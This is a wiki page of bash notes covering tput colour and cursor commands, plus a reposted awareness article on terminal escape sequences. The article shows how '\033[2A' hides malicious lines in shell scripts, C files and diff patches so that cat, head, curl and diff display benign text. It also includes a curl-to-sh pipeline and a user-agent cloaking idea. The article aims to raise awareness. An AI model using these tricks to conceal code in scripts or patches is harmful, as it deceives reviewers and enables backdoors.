====== BASH i okolice ======
===== Kolorowanie tekstu w terminalu i inne tamże sztuczki =====

Here is some more detail on the awesome tput command suggested in Ignacio's answer.

==== Colour commands ====
<code>
# Set the background colour using ANSI escape
tput setab [1-7]
# Set the foreground colour using ANSI escape
tput setaf [1-7]
</code>
Colours are as follows:
<code>
Num  Colour    #define         RGB

0    black     COLOR_BLACK     0,0,0
1    red       COLOR_RED       max,0,0
2    green     COLOR_GREEN     0,max,0
3    yellow    COLOR_YELLOW    max,max,0
4    blue      COLOR_BLUE      0,0,max
5    magenta   COLOR_MAGENTA   max,0,max
6    cyan      COLOR_CYAN      0,max,max
7    white     COLOR_WHITE     max,max,max
</code>
There are also non-ANSI versions of the colour setting functions (''setb'' instead of ''setab'', and ''setf'' instead of ''setaf'') which use different numbers, not given here.

==== Text mode commands ====
<code>
tput bold    # Select bold mode
tput dim     # Select dim (half-bright) mode
tput smul    # Enable underline mode
tput rmul    # Disable underline mode
tput rev     # Turn on reverse video mode
tput smso    # Enter standout (bold) mode
tput rmso    # Exit standout mode
tput sgr 0   # Reset all attributes
</code>
==== Cursor movement commands ====
<code>
tput cup Y X # Move cursor to screen postion X,Y (top left is 0,0)
tput cuf N   # Move N characters forward (right)
tput cub N   # Move N characters back (left)
tput cuu N   # Move N lines up
tput ll      # Move to last line, first column (if no cup)
tput sc      # Save the cursor position
tput rc      # Restore the cursor position
tput lines   # Output the number of lines of the terminal
tput cols    # Output the number of columns of the terminal
</code>
==== Clear and insert commands ====
<code>
tput ech N   # Erase N characters
tput clear   # Clear screen and move the cursor to 0,0
tput el 1    # Clear to beginning of line
tput el      # Clear to end of line
tput ed      # Clear to end of screen
tput ich N   # Insert N characters (moves rest of line forward!)
tput il N    # Insert N lines
</code>
==== Other commands ====
<code>
tput bel     # play a bell
</code>
With [[https://extensions.gnome.org/extension/669/wobbly-windows/|compiz wobbly windows]], the ''bel'' command makes the terminal wobble for a second to draw the user's attention.

==== Example usage ====


''echo "$(tput setaf 1)Red text $(tput setab 7)and white background$(tput sgr 0)"''
Looks like this on my Ubuntu terminal:

{{:linux:4stug.png?200|}}


Use command ''sgr 0'' to reset the colour at the end.

==== Performing multiple operations at once ====


''tput'' accepts scripts containing one command per line, which are executed in order before tput exits.

Avoid temporary files by echoing a multiline string and piping it:
<code>
echo -e "setf 7\nsetb 1" | tput -S  # set fg white and bg red
</code>
==== See also ====

  * See ''[[http://unixhelp.ed.ac.uk/CGI/man-cgi?tput+1|man 1 tput]]''
  * See ''[[http://www.manpagez.com/man/5/terminfo/|man 5 terminfo]]'' for the complete list of commands and more details on these options. (The corresponding tput command is listed in the Cap-name column of the huge table that starts at line 81.)

===== Backup bashem =====

http://www.cyberciti.biz/faq/how-to-wakeup-backup-nas-server-and-mirror-files-using-rsync-in-linux/



===== Ciekawostki =====

==== Federico Bento ''Terminal escape sequences'' ====


So recently i've encountered a post by Kurt Seifried of RedHat on  oss-sec's mailing list entitled //[[http://www.openwall.com/lists/oss-security/2015/08/11/8|"Terminal escape sequences - the new  XSS for admins?"]]//

This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.

How it technically works:

A terminal escape sequence is a special sequence of characters that is printed (like any other text).

If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.

While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.

<code bash>
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho  
doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!
</code>

As you can see, our beloved ''cat'' cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence **''\033[XA''** (being ''X'' the number of times) performed some action. And this action moves the cursor up ''X'' times, overwriting what is above it ''X'' lines. But this doesn't affect only '**cat**', it affects everything that  
interprets escape sequences.

<code bash>
$ head backdoor.sh
#!/bin/bash
echo doing something very nice!

$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!

$ more backdoor.sh
#!/bin/bash
echo doing something very nice!
</code>

It's not over yet!

<code bash>
$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!

$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
</code>

But if we pipe it into a shell...

<code bash>
$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!

$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!
</code>

You might be thinking //"If I opened that in my browser, I would detect it being malicious!"//

Well, think again...

One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then.

I wouldn't even be surprised if most of those install scripts that make use of these ''pipe into sh'' bullcrap abused this.

I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files...

It's no secret, most of us rely on ''cat'' to view files. I guess this is one black kitty, giving you bad luck.

Here's another example with a ''.c'' file

<code c>
$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing  
something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do  
much... */\n\tprintf("doing something very nice\\n");\n\treturn  
0;\n}\n' > nice.c
$ cat nice.c
#include <stdio.h>

int main()
{
	/* This simple program doesnt do much... */
	printf("doing something very nice\n");
	return 0;
}
</code>
<code bash>
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice
</code>

''diff'' also interprets escape sequences and so do the resulting patches 

Going back to the first example, imagine I have a ''backdoored.sh'' that is backdoored, and a legit.sh that does what it's output tells us.

<code bash>
$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!

$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!


$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh	2015-09-17 16:25:42.985349535 +0100
+++ legit.sh	2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
  #!/bin/bash
-echo doing something very nice!
+echo doing something very nice!

$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!
</code>

=== Hint: ===
''less'' doesn't interpret escape sequences unless the ''-r'' switch is used, so stop aliasing it to ''less -r'' just because there's no colored output.


s/party/hack like it's 1999